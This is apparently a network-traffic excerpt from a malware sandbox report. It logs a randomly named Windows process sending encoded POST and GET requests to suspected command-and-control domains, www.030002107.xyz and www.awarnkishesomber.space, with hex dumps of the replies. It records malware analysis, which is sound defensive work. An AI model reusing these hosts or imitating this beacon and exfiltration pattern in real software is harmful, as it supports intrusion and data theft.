4a 5a 46 61 74 58 75 33 4e 66 41 79 77 36 6f 50 68 67 59 61 43 68 58 6f 34 58 59 6b 72 43 67 4d 6a 55 54 61 31 63 56 4a 76 72 68 7a 68 63 6f 46 4a 43 2f 66 6a 79 4e 52 52 70 37 70 6c 4b 36 72 5a 64 66 45 48 48 57 77 4d 52 6f 45 39 37 4e 45 6b 76 77 79 55 6d 69 72 71 6f 2b 30 69 6e 46 63 3d Data Ascii: OrsLbfS8=reuGt8BFZi6Z0gW81xfQ41doBzG6icVd4M+7y6N1FxUCxnugQy6+LHM0KWSN3tVUAgnEwwZV1bydSkhiED0Xt9LvX8rwj0qwln6XnnwGXR9/cl1Q99W6fq4JZFatXu3NfAyw6oPhgYaChXo4XYkrCgMjUTa1cVJvrhzhcoFJC/fjyNRRp7plK6rZdfEHHWwMRoE97NEkvwyUmirqo+0inFc=
Nov 2, 2024 05:26:16.249629021 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 2, 2024 05:26:16.249644995 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49865	161.97.142.144	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:17.930027008 CET	10791	OUT	POST /e8he/ HTTP/1.1 Host: www.030002107.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.030002107.xyz Referer: http://www.030002107.xyz/e8he/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 72 65 75 47 74 38 42 46 5a 69 36 5a 30 67 57 38 31 78 66 51 34 31 64 6f 42 7a 47 36 69 63 56 64 34 4d 2b 37 79 36 4e 31 46 78 63 43 32 52 61 67 57 6a 36 2b 49 48 4d 30 48 32 53 41 33 74 56 7a 41 67 2b 73 77 77 56 72 31 5a 61 64 41 52 31 69 46 79 30 58 6e 39 4c 76 59 63 72 78 2b 45 72 74 6c 6a 6e 51 6e 6d 63 47 58 52 39 2f 63 6e 64 51 37 6f 36 36 64 71 34 4b 4a 31 61 62 64 2b 32 71 66 41 37 4c 36 6f 37 58 67 70 36 43 69 33 34 34 61 4b 38 72 41 41 4d 74 59 7a 62 32 63 56 31 47 72 6e 58 48 63 6f 78 6e 43 34 58 6a 78 62 30 6d 7a 50 35 36 62 34 69 4b 4e 65 6c 6e 50 68 59 36 54 49 59 45 79 75 42 78 77 45 36 73 72 43 33 6d 79 4e 30 6c 6d 54 5a 59 50 59 4f 44 70 39 50 72 34 4c 47 4a 4b 5a 55 41 4b 56 46 72 71 30 63 34 52 69 5a 77 43 47 69 37 63 79 76 58 72 35 44 45 66 71 4a 7a 6b 78 63 33 69 72 67 6d 64 41 38 54 48 36 49 4b 34 65 64 54 31 32 46 4c 46 39 4f 56 35 46 70 7a 48 6c 37 78 38 49 78 4a 4e 48 54 53 34 45 45 49 39 74 37 76 36 36 42 49 32 6f 46 55 73 45 78 4d 4d 49 38 79 49 [TRUNCATED] Data Ascii: OrsLbfS8=reuGt8BFZi6Z0gW81xfQ41doBzG6icVd4M+7y6N1FxcC2RagWj6+IHM0H2SA3tVzAg+swwVr1ZadAR1iFy0Xn9LvYcrx+ErtljnQnmcGXR9/cndQ7o66dq4KJ1abd+2qfA7L6o7Xgp6Ci344aK8rAAMtYzb2cV1GrnXHcoxnC4Xjxb0mzP56b4iKNelnPhY6TIYEyuBxwE6srC3myN0lmTZYPYODp9Pr4LGJKZUAKVFrq0c4RiZwCGi7cyvXr5DEfqJzkxc3irgmdA8TH6IK4edT12FLF9OV5FpzHl7x8IxJNHTS4EEI9t7v66BI2oFUsExMMI8yIpwH9xpZjHpGSsQgOWwbxkjvzLpdNLugfo/sbsL8hx2nsMejQEEyW7DoUxNHd+9+JHqdXFCKPkyReCreAHujEwejAuUCQ1PJZsVr1c0qF67ff5QRCfHzdVKd+UahbuSvg9oDVgEeQ1GfMAGRb6lsjAQmJJa5ksTlIVgbCNylSkJuAMiSq4yAd1vh4qvic+h3LJ7oHnnNF3rTyZ0wtIRoaV/lv9dDMlWLhubZl1iaMA6tu0/tq6CiN851eMtaVZlmQqPlRhpUL5ZqEEbvW6VdCsl888szWEDLz1jR8RPRUnSJpdvxSOt1krl0lIqE2vh6rC1OLYRBuoxwoJBCLrQEyNLLcvnePpGqLbVCeYh9tllmtnZGVt+5P75XQeO62+BIyKUDp0RfQOQ12ECAEfobSBRMufPToIaWZeOdwOL3k49ygnXCA7wHikZmYnm/sPG9r0ZAqCsofjLcQNBmGsvB8pvBGDikAevvzBROr+YS+KmIWuWfkQR/D4M6UGrhuWsbz58ZA+O/6zYwzoxwenDx95MraRyjHfdn+A8XgNUBzVmTQYislhiShxj+SM+P8paFh0i6EG9oxMc64NCqCs0mhrshKztAQtnERVpNI4cgoibcK1B1Kb+XS832W7N13FxLEFYHXcL79SCPZqmYjblQNOMn5BpmJY3zsHw [TRUNCATED]
Nov 2, 2024 05:26:18.796828985 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:18 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding ETag: W/"66cce1df-b96" Content-Encoding: gzip Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED] Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z\|Q&8UjXB]O;g}\|5@Ro&i<b)~KmA5n)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V\|NRkPqcq?mDEN&BFtKGQ/xI %iO\|CqCJAtV"\|"@(3'!A>0HpL(pHP8G,$Qc
Nov 2, 2024 05:26:18.796842098 CET	370	IN	Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0 Data Ascii: (aL`!I>:8%>!+F3\|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49879	161.97.142.144	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:20.472907066 CET	434	OUT	GET /e8he/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=mcGmuIJBWUmo2lDG7CTv4Gt1AD2/t65Xpsjm/p8yMz9hwSbJDz6KNi59ZBCF4oReBQPM+VZI2rOrUFRTE3AGx/mYes3pi0uyq0yr/jogXTNeK0R00JyjXeI= HTTP/1.1 Host: www.030002107.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:26:21.324090004 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 02 Nov 2024 04:26:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 2966 Connection: close Vary: Accept-Encoding ETag: "66cce1df-b96" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 2, 2024 05:26:21.324110985 CET	212	IN	Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.des
Nov 2, 2024 05:26:21.324120045 CET	1236	IN	Data Raw: 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 31 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e Data Ascii: cription-text {color: #707070;letter-spacing: -0.01em;font-size: 1.25em;line-height: 20px;}.footer {margin-top: 40px;font-size: 0.7em;}.animate__delay-1s {animation-delay: 1s;}@keyf
Nov 2, 2024 05:26:21.324130058 CET	212	IN	Data Raw: 2d 34 36 63 30 2d 32 35 2e 33 36 35 2d 32 30 2e 36 33 35 2d 34 36 2d 34 36 2d 34 36 7a 22 0a 09 09 09 09 09 09 09 3e 3c 2f 70 61 74 68 3e 0a 09 09 09 09 09 09 3c 2f 73 76 67 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 63 Data Ascii: -46c0-25.365-20.635-46-46-46z"></path></svg></div><h1 class="animate__animated animate__fadeIn">Page Not Found</h1><div class="description-text animate__animated animate__fadeIn a
Nov 2, 2024 05:26:21.324152946 CET	274	IN	Data Raw: 6e 69 6d 61 74 65 5f 5f 64 65 6c 61 79 2d 31 73 22 3e 0a 09 09 09 09 09 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f Data Ascii: nimate__delay-1s"><p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49913	188.114.97.3	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:26.495189905 CET	716	OUT	POST /rmi6/ HTTP/1.1 Host: www.awarnkishesomber.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.awarnkishesomber.space Referer: http://www.awarnkishesomber.space/rmi6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 31 70 66 78 69 2b 2f 51 43 69 34 54 6e 54 68 48 70 61 46 54 4c 77 55 6b 56 33 30 70 71 59 69 34 58 58 50 61 6a 76 35 68 4b 66 44 41 78 44 39 35 78 53 54 34 68 45 6f 33 67 38 47 32 70 6a 79 38 64 32 75 4c 72 72 78 51 33 77 49 74 4e 68 53 4f 34 43 69 51 79 79 68 56 71 47 33 64 64 4b 77 49 66 38 74 6d 4b 38 30 49 49 6d 78 39 71 79 4b 70 39 76 6c 48 56 52 58 76 72 6f 5a 46 70 4c 49 6b 67 5a 2f 4f 67 6e 64 58 45 68 53 46 73 73 47 30 35 37 56 52 33 70 79 6c 63 64 57 71 38 5a 47 47 72 34 46 55 45 73 57 53 4a 45 36 59 64 32 6d 38 61 63 4a 4d 38 56 61 66 31 36 46 4f 71 78 68 47 51 3d 3d Data Ascii: OrsLbfS8=g1pfxi+/QCi4TnThHpaFTLwUkV30pqYi4XXPajv5hKfDAxD95xST4hEo3g8G2pjy8d2uLrrxQ3wItNhSO4CiQyyhVqG3ddKwIf8tmK80IImx9qyKp9vlHVRXvroZFpLIkgZ/OgndXEhSFssG057VR3pylcdWq8ZGGr4FUEsWSJE6Yd2m8acJM8Vaf16FOqxhGQ==
Nov 2, 2024 05:26:27.226159096 CET	1026	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:26:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q0ucqdcnpn0qm6t51fkdeo2ebh; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache vary: accept-encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f2dgilmjHTCddkTslOwhilDx4zyf9ZjWYK6hmnVwCadv9XYDC3CsBHwV5CAHhCBbwuNGewKMBr%2FMlDGL3CYr1uw8lX2MKFd8d7BvvUUOLIsXb%2BQKF39R6zaz9HZCXvvp%2F%2FPIMsjpqXETXF7U2A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc15dcedca7467d-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=716&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49925	188.114.97.3	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:29.039731979 CET	736	OUT	POST /rmi6/ HTTP/1.1 Host: www.awarnkishesomber.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.awarnkishesomber.space Referer: http://www.awarnkishesomber.space/rmi6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 31 70 66 78 69 2b 2f 51 43 69 34 42 57 6a 68 4b 75 4f 46 47 37 77 56 72 31 33 30 6e 4b 59 2b 34 58 62 50 61 6d 50 70 68 5a 33 44 4f 77 7a 39 72 67 53 54 37 68 45 6f 6b 67 39 4d 72 35 6a 35 38 64 71 4d 4c 75 54 78 51 33 6b 49 74 49 46 53 53 62 61 39 43 53 79 6a 5a 4b 47 31 51 39 4b 77 49 66 38 74 6d 4b 6f 61 49 49 75 78 38 61 43 4b 6f 66 48 6b 4b 31 52 59 6f 72 6f 5a 4f 4a 4c 4d 6b 67 5a 4a 4f 68 36 49 58 48 4a 53 46 70 49 47 33 72 53 6e 49 48 70 4f 6d 73 63 61 76 4a 35 57 45 35 4e 50 61 54 51 50 50 4a 49 34 55 37 37 38 74 72 39 65 65 38 78 70 43 79 7a 78 44 70 4d 6f 64 52 36 30 36 54 53 55 66 68 68 79 44 69 6f 59 6d 67 4a 7a 70 41 77 3d Data Ascii: OrsLbfS8=g1pfxi+/QCi4BWjhKuOFG7wVr130nKY+4XbPamPphZ3DOwz9rgST7hEokg9Mr5j58dqMLuTxQ3kItIFSSba9CSyjZKG1Q9KwIf8tmKoaIIux8aCKofHkK1RYoroZOJLMkgZJOh6IXHJSFpIG3rSnIHpOmscavJ5WE5NPaTQPPJI4U778tr9ee8xpCyzxDpModR606TSUfhhyDioYmgJzpAw=
Nov 2, 2024 05:26:29.779442072 CET	1028	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:26:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cppadd7da2fdtmo0l1hlgorqo1; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache vary: accept-encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lF%2F05zzY4bFiC2nP2VOcT2NdZ3oYcSN438hRn57dFzC8O7QSp%2BP39dzmJGOgusO7B4aDiXBYEDQdpodF15g5GmlR4f%2F%2F52TsEOTd6NpFMlphFS4TNroRVwY4sCmbb06OUbMdwr2M1rgSvd%2FS3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8dc15ddeecd82e25-DFW Content-Encoding: gzip alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=1163&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49940	188.114.97.3	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:26:31.586420059 CET	10818	OUT	POST /rmi6/ HTTP/1.1 Host: www.awarnkishesomber.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.awarnkishesomber.space Referer: http://www.awarnkishesomber.space/rmi6/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 67 31 70 66 78 69 2b 2f 51 43 69 34 42 57 6a 68 4b 75 4f 46 47 37 77 56 72 31 33 30 6e 4b 59 2b 34 58 62 50 61 6d 50 70 68 66 76 44 4f 43 37 39 35 54 4b 54 31 42 45 6f 6e 67 39 50 72 35 6a 6f 38 64 79 49 4c 75 4f 45 51 30 63 49 2f 2b 5a 53 43 71 61 39 49 53 79 6a 52 71 47 30 64 64 4b 35 49 66 73 70 6d 4b 34 61 49 49 75 78 38 59 4b 4b 68 74 76 6b 49 31 52 58 76 72 6f 72 46 70 4c 30 6b 67 42 5a 4f 68 2f 7a 58 32 70 53 45 4a 34 47 32 65 6d 6e 58 33 70 32 76 38 64 48 76 4a 38 52 45 35 52 74 61 57 45 31 50 4c 55 34 48 4d 66 72 70 50 6c 35 44 63 64 61 63 54 7a 6f 4c 34 38 49 64 79 75 72 39 7a 71 33 42 42 52 74 50 79 5a 39 68 53 6b 30 30 77 59 42 4f 47 43 4a 4a 56 36 37 73 50 62 4a 67 2f 59 46 44 61 78 41 7a 6b 71 61 38 66 36 30 45 31 49 2b 6a 43 68 62 79 4b 49 62 66 4b 73 70 59 4b 49 49 53 34 37 34 57 46 56 6f 65 6e 41 54 57 6a 6e 6c 42 58 43 57 41 4b 37 7a 43 4b 42 57 47 2b 4b 6c 48 59 73 4d 46 65 6e 36 73 62 2b 51 6c 48 6c 4f 4f 67 6a 4b 2b 75 64 6f 47 6c 42 38 79 62 70 2b 36 [TRUNCATED] Data Ascii: OrsLbfS8=g1pfxi+/QCi4BWjhKuOFG7wVr130nKY+4XbPamPphfvDOC795TKT1BEong9Pr5jo8dyILuOEQ0cI/+ZSCqa9ISyjRqG0ddK5IfspmK4aIIux8YKKhtvkI1RXvrorFpL0kgBZOh/zX2pSEJ4G2emnX3p2v8dHvJ8RE5RtaWE1PLU4HMfrpPl5DcdacTzoL48Idyur9zq3BBRtPyZ9hSk00wYBOGCJJV67sPbJg/YFDaxAzkqa8f60E1I+jChbyKIbfKspYKIIS474WFVoenATWjnlBXCWAK7zCKBWG+KlHYsMFen6sb+QlHlOOgjK+udoGlB8ybp+6ZbcAUftoYS4N2B3+xU7KQvz1QN7f+5aKXS1Pm0oRkyJ23sD+hL2Su5vbbwE7wraY7wzoNsnjfpkFfkTvK2oAPvpMdnNUP3Qq6gOl7SdKit8nePAWTOMoCa4Mvo4P3OVoKAoYP2FGbx12QUNyT7s9ojTkFqZejhjDKSIXANSONmDh/NdAyy8nhxG/VQCNVKbscZO+L5fEJbOG5LgnglEIlzpEHd4hrTlEFpb40rn18tzHfGtHxLON/e5qrL+X6yV3gufx8Uh+FBxoBms4Wq+l0tuA4v0zuXfCVb4A+Yqm1MSWXYd7jqT0q2gja7ha28Us9j2GtuFUWcGf8cYOaM7MKZcRnE6EwbONwbyyfxQE/kUgPnmSrjp96bDVjJd7D0JJ/FDmtVsoO0IIASzDMYqktm4I++Qic+67zNbDjvV/upBmGb+NkYywn+JMVwkYCMjw9u71Emb18x+PG61wpWA8XZ8osSeHcCDdy4z7snnUIC8O3IjU7aTZX6zxHBBusHrdABvlqX7LtvNtIl7TUuR0/ssIouBhSKAax3ckqoxdebYyK